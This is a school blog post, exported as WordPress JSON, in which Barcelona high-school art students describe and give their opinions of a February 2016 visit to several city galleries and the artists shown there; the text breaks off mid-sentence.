{"id":1029,"date":"2016-02-03T14:30:30","date_gmt":"2016-02-03T13:30:30","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1029"},"modified":"2018-05-06T07:18:03","modified_gmt":"2018-05-06T05:18:03","slug":"passejant-entre-galeries-dart","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/","title":{"rendered":"El preu de l&#8217;Art"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>1.800\u20ac, 3.000\u20ac o 9.000\u20ac han sigut els preus d&#8217;algunes de les obres d&#8217;art que avui hem vist en diverses galeries d&#8217;art, del centre de Barcelona. I \u00e9s que des de la mat\u00e8ria de volum i amb l&#8217;acompanyament del professorat del departament de pl\u00e0stica, l&#8217;alumnat ha visitat aquest reguitzell de galeries, descobrint diferents artistes i obres a con\u00e8ixer.<\/p>\n<p><a href=\"http:\/\/www.barnadas.com\/ca\/\" target=\"_blank\">Galeria Jordi Barnadas<\/a>\u00a0\/\u00a0<a href=\"http:\/\/www.saladalmau.com\/\" target=\"_blank\">Sala Dalmau<\/a>\u00a0\/ <a href=\"http:\/\/www.ambitgaleriaart.com\/\" target=\"_blank\">galeria \u00c0mbit<\/a> \/ <a href=\"http:\/\/www.galeriajoanprats.com\/\" target=\"_blank\">galeria Joan Prats<\/a> \/ <a href=\"http:\/\/dolorsjunyent.com\/\" target=\"_blank\">galeria Dolors Junyent<\/a> \/ <a href=\"http:\/\/www.adngaleria.com\/web\/pag\/home.asp?la=ca\" target=\"_blank\">ADN galeria<\/a> \/ i <a href=\"http:\/\/3punts.com\/\" target=\"_blank\">galeria 3 Punts<\/a>.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-2\/\" rel=\"attachment wp-att-1039\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1039\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-2-300x200.jpg\" alt=\"ART-Galeries FEB (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-2.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-4\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1041 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-4-300x200.jpg\" alt=\"ART-Galeries FEB (4)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-4-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-4.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-3\/\" rel=\"attachment wp-att-1040\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1040\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-3-300x200.jpg\" alt=\"ART-Galeries FEB (3)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-3.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>GALERIA JORDI BARNADAS &#8211;<\/strong> C\/\u00a0Consell de Cent, 347 &#8211; BCN.<\/p>\n<p><strong>\u00c0lex Canela\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/strong><\/p>\n<blockquote><p>A la\u00a0<a href=\"http:\/\/www.barnadas.com\/ca\/\" target=\"_blank\">galeria Jordi Barnadas<\/a> hi ha una exposici\u00f3 col\u00b7lectiva sota el t\u00edtol <a href=\"http:\/\/barnadas.com\/img\/cms\/cataleg%20galeria%20BARNADAS%20-%20gener%202016%20resized_1.pdf\" target=\"_blank\">Colors d&#8217;hivern<\/a> que presenta obres d&#8217;\u00c0lvar Farr\u00e9, Didier Louren\u00e7o, Marta Moreu, Gabriel P. Bola\u00f1o i Gabriel Schmitz.\u00a0En aquesta petita, per\u00f2 acollidora galeria es troben unes excepcionals obres com per exemple:\u00a0<em>El Toro Torero<\/em> de Marta Moreu. Aquesta escultora nascuda a Barcelona, combina la seva professi\u00f3 de mestra amb viatges pel tot el m\u00f3n i la seva afici\u00f3 a l&#8217;esport. En les seves obres, esculpides majorit\u00e0riament en bronze, s&#8217;observa la plasmaci\u00f3 de moviment amb una gran facilitat. Les seves obres no s\u00f3n est\u00e0tiques i es troben sempre en un equilibri a punt de trencar-se.<\/p>\n<p>Tamb\u00e9 m&#8217;agradaria destacar el meravell\u00f3s quadre de <a href=\"https:\/\/www.facebook.com\/Gabriel-Schmitz-490919357670865\/\" target=\"_blank\">Gabriel Schmitz<\/a>, <em>La Chemise<\/em>, realitzat en carbonet sobre paper, amb un domini total del dibuix. Schmitz \u00e9s un artista alemany que viu a Barcelona. La seva obra recorda l&#8217;expressionisme tot i que els temes que prefereix evoquen llocs ex\u00f2tics com \u00c0frica i \u00c0sia.\u00a0Un altre obra\u00a0interessant \u00e9s l&#8217;<em><a href=\"http:\/\/www.barnadas.com\/1004-1444-large\/arusha-market.jpg\" target=\"_blank\">Arusha Market<\/a><\/em> d&#8217;\u00c0lvar Farr\u00e9. Artista angoleny que va estudiar Belles Arts a Barcelona. Els propis\u00a0olis mostren escenes del seu pa\u00eds amb una gran varietat de colors i amb un tra\u00e7 quasi infantil.<\/p>\n<p>Per cotrapartida, hi ha pintures que m&#8217;han deixat m\u00e9s aviat indiferent o simplement, no m&#8217;han transm\u00e8s tanta emoci\u00f3, com per exemple <em><a href=\"http:\/\/www.barnadas.com\/1001-1440-large\/el-sopar-es-a-taula.jpg\" target=\"_blank\">El Gran Paisatge<\/a><\/em>\u00a0o <em><a href=\"http:\/\/www.barnadas.com\/1000-1438-large\/el-sopar-es-a-taula.jpg\" target=\"_blank\">El Sopar \u00e9s a taula<\/a><\/em> de <a href=\"http:\/\/www.barnadas.com\/ca\/50-gabriel-perez-bolano\" target=\"_blank\">Gabriel P\u00e9rez Bola\u00f1o<\/a>. Amb un estil entre cubista i\u00a0c\u00f2mic. Aix\u00ed mateix, m&#8217;ha costat entendre l&#8217;obra de Didier Louren\u00e7o. Ell\u00a0va comen\u00e7ar fent litografies i actualment \u00e9s fam\u00f3s com a cartellista.<\/p>\n<p>En general, trobo que \u00e9s una exposici\u00f3 for\u00e7a interessant, mostra estils i t\u00e8cniques diferents, sempre donant un paper tant important al color, que potser el t\u00edtol de l&#8217;exposici\u00f3 \u00e9s quasi una broma. &#8211;\u00a0Webgrafia (Links emprats): <a href=\"http:\/\/barnadas.com\/img\/cms\/cataleg%20galeria%20BARNADAS%20-%20gener%202016%20resized_1.pdf\" target=\"_blank\">A<\/a>, <a href=\"http:\/\/www.apunts.org\/es\/marta-moreu-escultura-que-respira\/articulo\/13108887\/\" target=\"_blank\">B<\/a>, <a href=\"http:\/\/www.barcelona-metropolitan.com\/features\/a-dreamers-eye\/\" target=\"_blank\">C<\/a>, <a href=\"http:\/\/www.arteinformado.com\/guia\/f\/lvar-farre-maduell-8373\" target=\"_blank\">D<\/a>, <a href=\"http:\/\/www.arteinformado.com\/guia\/f\/lvar-farre-maduell-8373\" target=\"_blank\">E<\/a>, <a href=\"http:\/\/www.balaguer.tv\/exposicio-de-gabriel-perez-bolano-a-la-sala-del-grup-dart4\/\" target=\"_blank\">F<\/a>\u00a0i\u00a0<a href=\"http:\/\/www.didierlourenco.net\/?page_id=410\" target=\"_blank\">G<\/a><\/p><\/blockquote>\n<p>Neus \u00c1lvarez\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>De totes les galeries he triat la galeria <a href=\"http:\/\/www.barnadas.com\/ca\/\" target=\"_blank\">Jordi Barnadas<\/a>, on\u00a0hi havia una col\u00b7lectiva de pintura i escultura amb el nom de <em><a href=\"http:\/\/barnadas.com\/img\/cms\/cataleg%20galeria%20BARNADAS%20-%20gener%202016%20resized_1.pdf\" target=\"_blank\">Colors d\u2019hivern<\/a>. <\/em>Em va agradar molt ja que hi havien obres de diferents estils.<\/p>\n<p>Personalment l\u2019artista que m\u00e9s em va agradar va ser l\u2019<a href=\"http:\/\/www.barnadas.com\/ca\/23-alvar-farre\" target=\"_blank\">\u00c0lvar Farr\u00e9<\/a> pel fet de que representava obres sobre poblats africans on es podia veure la seva vida, tant diferent a la nostra. En els seus quadres utilitza\u00a0la t\u00e8cnica d&#8217;oli sobre tela.\u00a0Un altre artista amb qui em vaig fixar, va ser en <a href=\"http:\/\/www.barnadas.com\/ca\/50-gabriel-perez-bolano\" target=\"_blank\">Gabriel P\u00e9rez Bola\u00f1o<\/a>, on les seves obres d&#8217;estil\u00a0cubisme ressaltaven de la resta.\u00a0Els pintors <a href=\"http:\/\/www.didierlourenco.net\/\" target=\"_blank\">Didier Louren\u00e7o<\/a> i <a href=\"https:\/\/www.facebook.com\/Gabriel-Schmitz-490919357670865\/\" target=\"_blank\">Gabriel Schmitz<\/a>, tot i les seves difer\u00e8ncies, tenien una cosa en com\u00fa, exposaven retrats.<\/p>\n<p>Per finalitzar, cal destacar el fet que va ser la \u00fanica galeria on s\u2019hi representaven obres d\u2019una noia, en aquest cas de la <a href=\"http:\/\/www.martamoreu.com\/\" target=\"_blank\">Marta Moreu<\/a>. Les seves tres obres\u00a0eren escultures fetes en\u00a0bronze.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-6\/\" rel=\"attachment wp-att-1043\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1043\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-6-300x200.jpg\" alt=\"ART-Galeries FEB (6)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-6-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-6.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1042 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-5-300x200.jpg\" alt=\"ART-Galeries FEB (5)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-5.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-7\/\" rel=\"attachment wp-att-1044\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1044\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-7-300x200.jpg\" alt=\"ART-Galeries FEB (7)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-7-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-7.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-9\/\" rel=\"attachment wp-att-1045\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1045\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-9-300x200.jpg\" alt=\"ART-Galeries FEB (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-9.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-11\/\" rel=\"attachment wp-att-1046\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1046\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-11-300x200.jpg\" alt=\"ART-Galeries FEB (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-11.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-18\/\" rel=\"attachment wp-att-1049\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1049\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-18-300x200.jpg\" alt=\"ART-Galeries FEB (18)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-18-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-18.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1048\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-15-300x200.jpg\" alt=\"ART-Galeries FEB (15)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-15-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-15.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1050\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-19-300x200.jpg\" alt=\"ART-Galeries FEB (19)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-19-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-19.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1051\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-20-300x200.jpg\" alt=\"ART-Galeries FEB (20)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-20-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-20.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p><\/blockquote>\n<p><strong>SALA DALMAU\u00a0&#8211;\u00a0<\/strong>Consell de Cent, 349 &#8211; BCN.<\/p>\n<p>Noelia Soler\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>De totes les galeries visitades, dues m&#8217;han agradat molt, la primera \u00e9s la <a href=\"http:\/\/www.saladalmau.com\/\" target=\"_blank\">Sala Dalmau<\/a> amb\u00a0escultures de l\u2019artista uruguai\u00e0 <a href=\"http:\/\/www.pablobruera.com\/inicio\/bio\/\" target=\"_blank\">Pablo Bruera<\/a>. Totes les seves obres s\u00f3n estructures met\u00e0l\u00b7liques que\u00a0juguen amb el moviment, i fan\u00a0participar\u00a0a l&#8217;espectador que pot moure-les per formar diferents figures. Aquesta galeria \u00e9s la que m\u00e9s m\u2019ha encandilat i fascinat perqu\u00e8, hem tingut el plaer de con\u00e8ixer la\u00a0persona creadora de totes aquelles obres cin\u00e8tiques. En Pablo ens ha explicat el significat de les seves obres, el que ha suposat aquest treball per a ell i perqu\u00e8 s\u00f3n aix\u00ed.<\/p>\n<p>Per altre banda, <a href=\"http:\/\/3punts.com\/ca\" target=\"_blank\">la galeria 3 punts<\/a>, amb l&#8217;artista\u00a0<a href=\"http:\/\/efraimrodriguez.net\/en\" target=\"_blank\">Efra\u00efm Rodr\u00edguez<\/a>, tamb\u00e9 m&#8217;ha agradat. Efra\u00efm \u00e9s un escultor valenci\u00e0, totes les seves meravelloses escultures estan realitzades\u00a0amb\u00a0un sol material: \u00a0La fusta (per\u00f2 de diversos tipus). El tema central d\u2019aquesta exposici\u00f3 sembla ser la infantesa, o \u00e9s el que vol transmetre. Des de la meva perspectiva, la delicadesa del seu treball \u00e9s incre\u00efble, magn\u00edfica i sorprenentment realista.<\/p><\/blockquote>\n<p>Valeria Marca\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote><p>Este 3 de febrero, los estudiantes de bachillerato art\u00edstico hicimos una ruta de galer\u00edas de arte. Muchas de ellas no eran tan llamativas como para esperar a visualizarlo detenidamente. Pero en una de las 8 galer\u00edas pude apreciarla m\u00e1s. Se trata de la<a href=\"http:\/\/www.saladalmau.com\/\" target=\"_blank\">\u00a0Sala Dalmau<\/a>, en ella expone el escultor <a href=\"http:\/\/www.pablobruera.com\/inicio\/bio\/\" target=\"_blank\">Pablo Bruera<\/a>, presente en nuestra visita, nos explic\u00f3 sus procedimientos de una manera tan sencilla y entendedora, que incluso nos anim\u00f3 a que cada uno intentara hacer ciertos pasos para construir\u00a0una escultura personal similar a las de \u00e9l. Gracias a su explicaci\u00f3n pudimos entender m\u00e1s cosas del por qu\u00e9 de las figuras, colores y tama\u00f1os. Fue una visita m\u00e1s pr\u00e1ctica y entendedora hacia sus obras.<\/p>\n<p>En conclusi\u00f3n, me gust\u00f3 el hecho de que pudimos escuchar del propio autor el significado de sus obras y no el de habernos ido como entramos, sin sacar nada de provecho .<\/p><\/blockquote>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-21\/\" rel=\"attachment wp-att-1052\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1052\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-21-300x200.jpg\" alt=\"ART-Galeries FEB (21)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-21-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-21.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-22\/\" rel=\"attachment wp-att-1053\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1053\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-22-300x200.jpg\" alt=\"ART-Galeries FEB (22)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-22-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-22.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-23\/\" rel=\"attachment wp-att-1054\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1054\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-23-300x200.jpg\" alt=\"ART-Galeries FEB (23)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-23-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-23.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-24\/\" rel=\"attachment wp-att-1055\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1031\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-26-300x200.jpg\" alt=\"ART-Galeries FEB (26)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-26-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-26.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1055\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-24-300x200.jpg\" alt=\"ART-Galeries FEB (24)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-24-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-24.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-25\/\" rel=\"attachment wp-att-1030\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1030\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-25-300x200.jpg\" alt=\"ART-Galeries FEB (25)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-25-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-25.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-27\/\" rel=\"attachment wp-att-1032\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1032\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-27-300x200.jpg\" alt=\"ART-Galeries FEB (27)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-27-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-27.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-28\/\" rel=\"attachment wp-att-1033\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1033\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-28-300x200.jpg\" alt=\"ART-Galeries FEB (28)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-28-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-28.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p dir=\"ltr\">\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-29\/\" rel=\"attachment wp-att-1034\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1034\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-29-300x200.jpg\" alt=\"ART-Galeries FEB (29)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-29-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-29.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/passejant-entre-galeries-dart\/attachment\/art-galeries-feb-30\/\" rel=\"attachment wp-att-1035\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1035\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-30-300x200.jpg\" alt=\"ART-Galeries FEB (30)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-30-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/02\/ART-Galeries-FEB-30.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p dir=\"ltr\"><strong>ADN\u00a0GALERIA<\/strong>\u00a0&#8211; C\/ Enric Granados 49\u00a0&#8211; BCN. <a href=\"http:\/\/www.adngaleria.com\/web\/pag\/expos.asp?i=2513&amp;o=5&amp;la=ca\" target=\"_blank\">Link a galeria.<\/a><\/p>\n<p dir=\"ltr\">Vicky Tortato\u00a0______________________________________ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<blockquote>\n<p dir=\"ltr\"><a href=\"http:\/\/www.adngaleria.com\/web\/pag\/expos.asp?i=2513&amp;o=5&amp;la=ca\" target=\"_blank\">Ivan Argote<\/a> is a Colombian artist who lives and works in Paris, deals with the\u00a0way that man relates with the myriad changes that take place daily in the\u00a0historical, economic, political ahichd moral realms. His aim is to question 